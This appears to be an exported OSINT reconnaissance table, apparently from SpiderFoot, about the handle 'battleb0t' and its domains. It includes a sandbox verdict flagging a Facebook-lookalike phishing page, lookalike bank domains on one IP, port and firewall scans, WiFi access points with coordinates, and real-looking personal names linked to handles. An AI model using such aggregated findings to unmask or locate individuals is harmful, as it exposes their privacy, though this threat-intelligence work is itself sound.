| 2023-05-12 02:47:17 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://rakha360.github.io/facebook', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'http://rakha360.github.io/facebook', u'type': u'submitted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://rakha360.github.io/facebook', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"kit.fontawesome.com"\n "rakha360.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "185.199.111.153:443"\n "104.18.22.52:443"\n "172.64.169.22:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"rakha360.github.io"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_9c4_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_9c4_IESQMMUTEX_0_303"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_9c4_IESQMMUTEX_0_519"\n "IsoScope_9c4_IE_EarlyTabStart_0xb00_Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2500"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "IsoScope_9c4_IESQMMUTEX_0_331"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_9c4_ConnHashTable<2500>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "facebook_1_.htm" has type "HTML document UTF-8 Unicode text with CRLF line terminators"- [targetUID: N/A]\n "free-v4-font-face.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "_2E56694C-B34B-11ED-9FE5-0800270497D3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 180 x 45 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "favicon_1_.ico" has type "MS Windows icon resource - 2 icons 32x32 32 bits/pixel 16x16 32 bits/pixel"- [targetUID: N/A]\n "facebook_1_.htm" has type "HTML document ASCII text with CRLF line terminators"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "~DF38C0E91F31DE9AC8.TMP" has type "data"- Location: [%TEMP%\\~DF38C0E91F31DE9AC8.TMP]- [targetUID: 00000000-00002500]\n "~DFBFD127F7C6B8EB92.TMP" has type "data"- Location: [%TEMP%\\~DFBFD127F7C6B8EB92.TMP]- [targetUID: 00000000-00002500]\n "RecoveryStore._CE31769F-B348-11ED-9FE5-0800270497D3_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00002500]\n "R9LTVOO7.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\R9LTVOO7.txt]- [targetUID: 00000000-00002500]\n "imagestore.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\imagestore\\3mt7jhv\\imagestore.dat]- [targetUID: 00000000-00002500]\n "~DF5A4B20CAF7FF8423.TMP" has type "data"- Location: [%TEMP%\\~DF5A4B20CAF7FF8423.TMP]- [targetUID: 00000000-00002500]\n "~DF1E20889D13C0AA85.TMP" has type "data"- Location: [%TEMP%\\~DF1E20889D13C0AA85.TMP]- [targetUID: 00000000-00002500]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "search_1_.json" has type "JSON data"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-102', u'name': u'Decrypted SSL network traffic', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'"GET /facebook HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: rakha360.github.io"\n "GET /facebook/ HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: rakha360.github.io"\n "HTTP/1.1 301 Moved Permanently\nConnection: keep-alive\nContent-Length: 162\nServer: GitHub.com\nContent-Type: text/html\npermissions-policy: interest-cohort=()\nLocation: https://rakha360.github.io/facebook/\nX-GitHub-Request-Id: B05E:70FD:4CDC77:57E341:63F715D2\nAccept-Ranges: bytes\nDate: Thu, 23 Feb 2023 07:44:21 GMT\nVia: 1.1 varnish\nAge: 900\nX-Served-By: cache-sjc10044-SJC\nX-Cache: HIT\nX-Cache-Hits: 1\nX-Timer: S1677138262.911903,VS0,VE1\nVary: Accept-Encoding\nX-Fastly-Request-ID: 20236c9c777600e56880cbbcc15a8ab66019f0d5"\n "<html>\n<head><title>301 Moved Permanently</title></head>\n<body>\n<center><h1>301 Moved Permanently</h1></center>\n<hr><center>nginx</center>\n</body>\n</html>"\n "GET /facebook/style.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://rakha360.github.io/facebook/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rakha360.github.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /facebook/img/logo.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://rakha360.github.io/facebook/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rakha360.github.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /facebook/img/mobile.png HTTP/1.1\nAccept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5\nReferer: https://rakha360.github.io/facebook/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rakha360.github.io\nDNT: 1\nConnection: Keep-Alive"\n "GET /facebook/responsive.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://rakha360.github.io/facebook/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rakha360.github.io\nDNT: 1\nConnection: Keep-Alive"\n "XIo8>\'@@Dy\nzpsAPmqBDI!%"\'%31Z$>{/EdkotWQ./j-dE_,=G)kHt#qy9*wu+njPz(z>~(+t3[fJ<Y{x4Ro""f.5CG4a~>Ib4&eNlOqc?2GCOgG"?.=qZ;T+`rH&#DKDbSGpfmBn1X8a"b0fm;tTC\|*Pt\nq;rDn5LUEgPggoebU3F:D\\1L@V#tcKui_EU2IG0F0k\ncQJ(Ul\ni](Dpn;6\nJY L4^STr?J:kB\'lYyY3\n \nde*z]@91U+r950 0/@\'!Q|vCz\\}nTAR9,<r.26R:inuHCrsKmwg\nwt4N9+I]u%8giXs,kXcuhy1QdZ1iu<R=&jim)kon"!&NvZJ$[@&lvc@^T3VM.d|m8Y0?L84\n/FFfE=!E)(J\\~`63jZ2lhj|8;lQ;Q:sFj bJTZ1\'rT\'vxNMs;n6$6{Nx-|&Ww9c6@n92$OJ|&K,?^IN_v!)xbR^si\nVf6Pdn_5h-5:q(fQs!
s{4$s6a"CFs/2S`[XLLeHuidOmz\'~}brTOmX7\nD;``UU}4v`X/f*9c?I-*Y^Q^?)}[|sw;w$wq9n_mCI(d", "RgjT\'k\\ZZhT>$$q;bQJJDmEPw\n})iGD;OrT0T.zs{>p{8P\n+GfUS;UL-`G\nzu?9Fs_:sY*gv>uI?cY", "Zn6>@QM*q(v7&h9\\i,Hv@qK4/}v-$Ai`-3ho=9Ah;?]{L`__!:(>rJcRq~J:hm((8L;](2A\\*0$5DQ0%]GK"AvIxh:AjIpR%`jLAj=)Q]2LaIE#@>`ISzG@\n=TX(jMlX)OSrL"<|oI)%bU)2$7=Y L}x^v_+1s!)YS9*T_|Q3O@xi3aB :nJXr\n/ T:/ Yi%p!aat\n"}3`\nuq=*_+(1#.`6J[]AjR)\\\\1Ojr7s%duY!9hiWDRh:k+\nw!@B\nuL[!mj[;cLBK_&+)e\n|\nQ4+Mq9_v;=\'x\no5q{"By,;((6qJt3PAL-UW[IQxPxbzoW}&@XhLGx,P^\nyU\\:2aS.9QLFjuDH"@fYD;hi/5\\\nz,`Wbi+$B>WLJZab(d$j1iwz:|75&W<4+kv\n><>,,$33d],{Hi\nyp8#]|B$|H|@\n~nywb(OPadcD)G?xL[I2RV$NL&/\nBy{l.E#x"f"B<$9Ce6C\nEy4He8?!k@T#7jEvBQ5J:VpS[O jf{t SU_\\.wU/HkG", "$LwX@g6N59yr1~SK.T$oP[_~=e0%qKMb.6`-/0k6y%krfrog>;Vojf\\)\nUf/,VQ`-D; :KKM`t<DidJ\\uvc=a![O1:[21u$,[n(AX/q@!lYe=V%%2mxrY2v/+~k,HRK\nQl+s,eMR:%P~\'DM4#0/Y]|g~Q:\\JWOX#H":o("\n "HTTP/1.1 200 OK\nConnection: keep-alive\nContent-Length: 15909\nServer: GitHub.com\nContent-Type: image/png\npermissions-policy: interest-cohort=()\nLast-Modified: Wed, 22 Feb 2023 07:53:22 GMT\nAccess-Co | 185.199.111.153 |
| 2023-05-12 02:46:54 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | battleb0t.github.io |
| 2023-05-12 03:00:49 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0-l.github.io | 185.199.111.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Apple Network 0a20a8 (Net ID: 00:02:2D:0A:20:A8) | 50.1188, 8.6843 |
| 2023-05-12 03:00:49 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.71): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MainSurf (Net ID: 00:02:2D:67:EF:87) | 50.1188, 8.6843 |
| 2023-05-12 02:45:19 | Physical Location | No | ipapi.co | 1 | 0 | 4 | 0 | None | Ashburn, Virginia, VA, United States, US | 2600:1f18:2489:8200::c8 |
| 2023-05-12 03:11:24 | Physical Location | No | AbstractAPI | 0 | 0 | 3 | 0 | None | Arizona, United States | +14805058800 |
| 2023-05-12 03:00:29 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 4 | 0 | None | chacha20-poly1305@openssh.com | {"operating_system": {"vendor": "Ubuntu", "product": "Linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, "last_updated_at": "2023-05-11T07:25:44.787Z", "ip": "46.101.229.70", "labels": ["remote-access"], "location_updated_at": "2023-05-01T12:20:02.406356Z", "autonomous_system_updated_at": "2023-05-01T12:20:02.407454Z", "location": {"province": "Hesse", "city": "Frankfurt am Main", "country": "Germany", "coordinates": {"latitude": 50.11552, "longitude": 8.68417}, "postal_code": "60306", "country_code": "DE", "timezone": "Europe/Berlin", "continent": "Europe"}, "dns": {"records": {"www3citi5ensbnk01.nerdpol.ovh": {"record_type": "A", "resolved_at": "2023-05-08T21:52:09.615214562Z"}, "www3citizensbnk01.ddns.net": {"record_type": "A", "resolved_at": "2023-04-03T07:30:40.764584949Z"}, "www3citlzensbnk.ddns.net": {"record_type": "A", "resolved_at": "2023-04-23T19:19:28.631638390Z"}, "chainsyncpages.ddns.net": {"record_type": "A", "resolved_at": "2023-04-05T19:58:37.967204478Z"}, "mail.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-05-03T14:09:55.384272288Z"}, "jnbt05.easypanel.host": {"record_type": "A", "resolved_at": "2023-05-10T17:13:22.939829997Z"}, "intelligent-euclid.46-101-229-70.plesk.page": {"record_type": "A", "resolved_at": "2023-04-28T22:08:15.278436745Z"}, "www.46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.707553225Z"}, "46-101-229-70.cprapid.com": {"record_type": "A", "resolved_at": "2023-04-30T14:18:11.520320906Z"}}, "names": ["chainsyncpages.ddns.net", "www3citi5ensbnk01.nerdpol.ovh", "www3citizensbnk01.ddns.net", "www3citlzensbnk.ddns.net", "www.46-101-229-70.cprapid.com", "46-101-229-70.cprapid.com", "intelligent-euclid.46-101-229-70.plesk.page", "jnbt05.easypanel.host", 
"mail.46-101-229-70.cprapid.com"]}, "services": [{"transport_protocol": "TCP", "_encoding": {"banner": "DISPLAY_UTF8", "banner_hex": "DISPLAY_HEX"}, "labels": ["remote-access"], "truncated": false, "service_name": "SSH", "_decoded": "ssh", "banner_hashes": ["sha256:74d4fa601a4a1f78b519a7bc16ea591fab7d4addbe589649de627c34c4e0d38a"], "source_ip": "167.94.145.60", "extended_service_name": "SSH", "observed_at": "2023-05-11T07:25:44.640117776Z", "banner_hex": "5353482d322e302d4f70656e5353485f382e397031205562756e74752d337562756e7475302e31", "perspective_id": "PERSPECTIVE_ORANGE", "transport_fingerprint": {"raw": "28960,64,true,MSTNW,1460,false,false", "os": "Ubuntu / Debian / CentOS", "id": 72}, "banner": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1", "port": 22, "ssh": {"server_host_key": {"fingerprint_sha256": "654b926728b59e31856ca456546380aae9ad6f0105be964db40d456c35d8474b", "ecdsa_public_key": {"_encoding": {"b": "DISPLAY_BASE64", "gy": "DISPLAY_BASE64", "n": "DISPLAY_BASE64", "p": "DISPLAY_BASE64", "y": "DISPLAY_BASE64", "x": "DISPLAY_BASE64", "gx": "DISPLAY_BASE64"}, "b": "WsY12Ko6k+ez671VdpiGvGUdBrDMU7D2O848PifSYEs=", "curve": "P-256", "gy": "T+NC4v4af5uO5+tKfA+eFivOM1drMV7Oy7ZAaDe/UfU=", "gx": "axfR8uEsQkf4vOblY6RA8ncDfYEt6zOg9KE5RdiYwpY=", "p": "/////wAAAAEAAAAAAAAAAAAAAAD///////////////8=", "length": 256, "y": "b/8s4eFX87LHgM34ZW3g9GyhRKNQyQUUsPt17LQ/ZJc=", "x": "OF+EuiYliuprX40ENBhAbc+GOunuKTpVTjg/1oXm5JM=", "n": "/////wAAAAD//////////7zm+q2nF56E87nKwvxjJVE="}}, "algorithm_selection": {"server_to_client_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "host_key_algorithm": "ecdsa-sha2-nistp256", "client_to_server_alg_group": {"mac": "hmac-sha2-256", "cipher": "aes128-ctr", "compression": "none"}, "kex_algorithm": "curve25519-sha256@libssh.org"}, "kex_init_message": {"host_key_algorithms": ["rsa-sha2-512", "rsa-sha2-256", "ecdsa-sha2-nistp256", "ssh-ed25519"], "client_to_server_compression": ["none", "zlib@openssh.com"], 
"server_to_client_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "client_to_server_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"], "first_kex_follows": false, "kex_algorithms": ["curve25519-sha256", "curve25519-sha256@libssh.org", "ecdh-sha2-nistp256", "ecdh-sha2-nistp384", "ecdh-sha2-nistp521", "sntrup761x25519-sha512@openssh.com", "diffie-hellman-group-exchange-sha256", "diffie-hellman-group16-sha512", "diffie-hellman-group18-sha512", "diffie-hellman-group14-sha256"], "server_to_client_compression": ["none", "zlib@openssh.com"], "client_to_server_ciphers": ["chacha20-poly1305@openssh.com", "aes128-ctr", "aes192-ctr", "aes256-ctr", "aes128-gcm@openssh.com", "aes256-gcm@openssh.com"], "server_to_client_macs": ["umac-64-etm@openssh.com", "umac-128-etm@openssh.com", "hmac-sha2-256-etm@openssh.com", "hmac-sha2-512-etm@openssh.com", "hmac-sha1-etm@openssh.com", "umac-64@openssh.com", "umac-128@openssh.com", "hmac-sha2-256", "hmac-sha2-512", "hmac-sha1"]}, "endpoint_id": {"comment": "Ubuntu-3ubuntu0.1", "_encoding": {"raw": "DISPLAY_UTF8"}, "protocol_version": "2.0", "software_version": "OpenSSH_8.9p1", "raw": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.1"}, "hassh_fingerprint": "699519fdcc30cbcd093d5cd01e4b1d56"}, "software": [{"source": "OSI_APPLICATION_LAYER", "product": "openssh", "other": {"comment": "Ubuntu-3ubuntu0.1"}}, {"source": "OSI_TRANSPORT_LAYER", "product": "linux", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:*:linux:*:*:*:*:*:*:*:*"}, {"product": "Linux", "vendor": "Ubuntu", "source": "OSI_APPLICATION_LAYER", "part": "o", "uniform_resource_identifier": "cpe:2.3:o:canonical:ubuntu_linux:*:*:*:*:*:*:*:*", "other": {"family": "Linux"}}, {"product": "OpenSSH", 
"vendor": "OpenBSD", "version": "8.9p1", "source": "OSI_APPLICATION_LAYER", "other": {"family": "OpenSSH"}, "uniform_resource_identifier": "cpe:2.3:a:openbsd:openssh:8.9p1:*:*:*:*:*:*:*", "part": "a"}]}], "autonomous_system": {"bgp_prefix": "46.101.128.0/17", "country_code": "US", "asn": 14061, "name": "DIGITALOCEAN-ASN", "description": "DIGITALOCEAN-ASN"}} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys-g (Net ID: 00:06:25:C0:74:7C) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SX551573A43 (Net ID: 00:01:E3:57:3A:43) | 52.3759, 4.8975 |
| 2023-05-12 03:01:40 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.181): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.222): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:34:24 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 45.131.109.48 | 45.131.109.53 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Interwrx1 (Net ID: 00:02:2D:A8:7E:D5) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | My Passport (2.4 GHz) - 07B79D (Net ID: 00:00:C0:07:B7:9D) | 37.780462,-122.390564 |
| 2023-05-12 03:15:08 | Similar Domain | Yes | TLD Searcher | 1 | 0 | 1 | 0 | None | battleb0t.wtf | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | hhcpatp (Net ID: 00:06:25:49:AE:74) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Caymen-ENT (Net ID: 00:00:C5:DE:B8:F1) | 34.0544, -118.244 |
| 2023-05-12 02:44:03 | Username | No | SpiderFoot UI | 36 | 0 | 0 | 0 | None | ayshoo | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 03:01:19 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.170): Search Engine<br>Last Activity: 0 days ago<br>Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | wullbrandt (Net ID: 00:06:25:51:EC:E1) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:44:15 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | funny.battleb0t.xyz |
| 2023-05-12 02:55:01 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden<br>Server: cloudflare<br>Date: <REDACTED><br>Content-Type: text/html<br>Content-Length: 151<br>Connection: keep-alive<br>CF-RAY: 7c581b373d7d806c-ORD | 188.114.96.1 |
| 2023-05-12 02:54:00 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 104.21.6.166:2052 | 104.21.6.166 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ENDOMED (Net ID: 00:02:CF:87:A5:FB) | 40.2024, 29.0398 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RPOWER1 (Net ID: 00:02:6F:B3:3B:A8) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:53:04 | Raw Data from RIRs | No | Tool - WAFW00F | 1 | 0 | 2 | 0 | None | [{"url": "https://fluid.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://fluid.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] | fluid.battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:05:5D:EC:C1:DE) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:24:22 | Web Content | No | Web Spider | 1 | 0 | 2 | 0 | None | <!DOCTYPE html><br><html><br><iframe src="https://cloudways-static-content.s3.us-east-1.amazonaws.com/error_page/maintenance-domain-mapping.html" frameborder="0" style="overflow:hidden;overflow-x:hidden;overflow-y:hidden;height:100%;width:100%;position:absolute;top:0px;left:0px;right:0px;bottom:0px" height="100%" width="100%"></iframe><br></html> | https://kekw.battleb0t.xyz/jar |
| 2023-05-12 03:22:23 | Account on External Site | No | Account Finder | 0 | 0 | 2 | 0 | None | imgur (Category: images)<br>https://imgur.com/user/battleb0t/about | battleb0t |
| 2023-05-12 03:24:49 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | Domain Name: CLOUDFLARESSL.COM
Registry Domain ID: 1877752347_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2023-03-17T11:06:38Z
Creation Date: 2014-09-27T01:11:37Z
Registry Expiry Date: 2032-09-27T01:11:37Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS1.CLOUDFLARESSL.COM
Name Server: NS2.CLOUDFLARESSL.COM
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 E6F95480B8B7B40CB784DEFF3DB68992C1A795554748DAB4CCE69FD298BD5F1F
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
